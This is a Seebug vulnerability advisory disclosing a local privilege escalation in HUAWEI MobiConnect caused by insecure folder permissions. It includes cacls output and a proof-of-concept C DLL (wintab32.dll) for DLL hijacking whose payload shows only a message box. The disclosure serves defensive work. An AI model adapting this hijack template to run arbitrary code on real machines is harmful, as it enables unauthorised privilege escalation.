HUAWEI MobiConnect 23.9.17.216 - Privilege Escalation

2015-09-02T00:00:00
ID SSV:89300
Type seebug
Reporter 拿破轮胎
Modified 2015-09-02T00:00:00

Description

A local privilege escalation vulnerability has been discovered in the official HUAWEI MobiConnect 23.009.17.00.216 software. The local security vulnerability allows an attackers to gain higher access privileges by execution of arbitrary codes in connection with dll hijacking.

The security risk of the local privilege escalation vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7. Exploitation of the vulnerability requires a local privileged systen user account without user for interaction. Successful exploitation of the privilege escalation web vulnerability results in software- or system compromise.

                                        
                                            
                                                Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with restricted system privileges and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [Insecure Permissions Local Privilege Escalation] ---
C:\Program Files>cacls "MobiConnect"
C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F
                             BUILTIN\Utilisateurs:(CI)F
                             NT SERVICE\TrustedInstaller:(ID)F
                             NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
                             AUTORITE NT\Système:(ID)F
                             AUTORITE NT\Système:(OI)(CI)(IO)(ID)F
                             BUILTIN\Administrateurs:(ID)F
                             BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F
                             CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
C:\Program Files\MobiConnect>cacls "MobiConnect.exe"
C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F
                                             AUTORITE NT\Système:(ID)F
                                             BUILTIN\Administrateurs:(ID)F

--- PoC Session Logs [DLL Hijacking Exploit (wintab32.dll)] ---
*/

#include <windows.h> 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
owned();
case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

int owned() {
MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK);
}